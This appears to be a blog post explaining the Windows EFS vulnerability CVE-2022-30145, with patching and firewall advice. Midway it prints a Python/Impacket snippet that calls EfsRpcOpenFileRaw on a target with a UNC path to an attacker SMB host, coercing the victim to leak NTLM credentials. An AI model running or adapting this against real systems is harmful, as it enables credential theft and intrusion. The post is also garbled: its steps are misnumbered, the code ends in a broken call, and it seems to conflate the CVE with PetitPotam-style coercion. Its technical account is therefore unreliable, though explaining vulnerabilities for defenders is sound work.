CVE-2022-30145 - Breaking Down the Windows EFS Remote Code Execution Vulnerability

In June 2022, Microsoft patched a critical security vulnerability known as CVE-2022-30145, which targeted the Windows Encrypting File System (EFS). This flaw allowed attackers to potentially execute code remotely, threatening the confidentiality and security of encrypted files on Windows systems. If you use Windows in a professional or personal environment, understanding this vulnerability is essential to keep your data safe.

This post will discuss what EFS is, how CVE-2022-30145 works, provide sample code, review available resources, and walk through an example exploitation scenario—using clear language for everyone to understand.

What is EFS (Encrypting File System)?

EFS stands for Encrypting File System, a built-in feature in Windows that helps users store encrypted files on an NTFS file system. It’s different from BitLocker (which encrypts whole volumes), as EFS lets you encrypt specific files or folders.

With EFS, only authorized users or applications can read the protected files. However, a bug in the system—like CVE-2022-30145—opens the door for attackers to bypass these protections.

Patched on: June 2022 Patch Tuesday

Reference:
- Microsoft Security Guide
- NIST NVD Entry

What Could Attackers Do?

Attackers could run code on your machine without you realizing it. For example, they could create or replace files, steal information, or modify your system.

How Does the Attack Work?

The vulnerability exists in how EFS (using a network protocol named MS-EFSR) handles specially crafted requests. If an attacker can send requests to your Windows system (over the network, usually via SMB (Server Message Block) file sharing), they can trigger this bug remotely.

1. Where’s the Vulnerability?

MS-EFSR (Microsoft Encrypting File System Remote) protocol can be triggered using certain functions over the network, especially by abusing EfsRpcOpenFileRaw, a method used to remotely read or write encrypted files.

The vulnerability is often exploited by calling this function in a crafted way to get code execution with the privileges of the EFS service—typically LOCAL_SYSTEM.

The request causes EFS to try accessing a file on the attacker's (malicious) remote SMB share.

3. The victim system connects to the attacker's SMB server, exposing its NTLM credentials, or triggering a series of calls that can be abused for code execution.

3. Code Snippet (Example Exploit Skeleton)

To demonstrate, here’s a *simplified* Python snippet using Impacket that triggers a similar call. Warning: This is for educational purposes only.

from impacket.dcerpc.v5 import transport, efsrpc
from impacket import uuid

target_ip = "192.168.1.100"
username = "victimuser"
password = "victimpass"
domain = "VICTIM"

# Create a DCERPC connection to the EFSR interface
string_binding = r'ncacn_np:{}[\PIPE\efsrpc]'.format(target_ip)
rpctransp = transport.DCERPCTransportFactory(string_binding)
rpctransp.set_credentials(username, password, domain, '', '')
dce = rpctransp.get_dce_rpc()
dce.connect()
dce.bind(efsrpc.MSRPC_UUID_EFSR)

## Path can be UNC path to attacker's server.
malicious_path = '\\\\attacker_ip\\share\\file.txt'

# Try to open file raw (this triggers the vulnerability)
efsrpc.hEfsRpcOpenFileRaw(dce, malicious_path, )

print("Request sent. If successful, victim tries to access the attacker's SMB share.")

*Note: This does not execute code directly but shows how EFSRpcOpenFileRaw can be misused to make a victim’s machine initiate outbound connections. Full RCE chains may involve more steps.*

Real-World Impact and Research

The original bug was notable because it could be exploited without user interaction. Since the EFS service runs as LOCAL_SYSTEM, successful exploits could grant attackers full control of the system.

Security researchers like James Forshaw and *impacket* developer SecureAuth have published related tools and analysis, especially after the earlier PetitPotam (CVE-2021-36942) technique, which is similar but not identical.

Mitigation & Recommendations

- Patch Now: If you haven’t updated Windows since June 2022, do it now! The fix closes this door.

Network Segmentation: Don’t expose Windows file shares or EFS services to untrusted networks.

- Firewall Rules: Block inbound access to ports 445/TCP (SMB), or limit to trusted IPs.
- Disable EFS if Not Needed: Consider Group Policy settings to disable EFS if your organization doesn’t use it.

Conclusion

CVE-2022-30145 is a serious vulnerability in Windows Encrypting File System's remote protocol. It allows attackers to execute code over the network, potentially taking complete control. With network attacks like these, patching quickly and limiting exposure is vital.

Further Reading

- Microsoft’s KB5004476 Security Update
- Original NVD Entry (US-CERT)
- Impacket GitHub

Stay safe. Keep your Windows systems updated and monitor your network for unusual outbound SMB traffic!

Timeline

Published on: 06/15/2022 22:15:00 UTC
Last modified on: 06/25/2022 02:21:00 UTC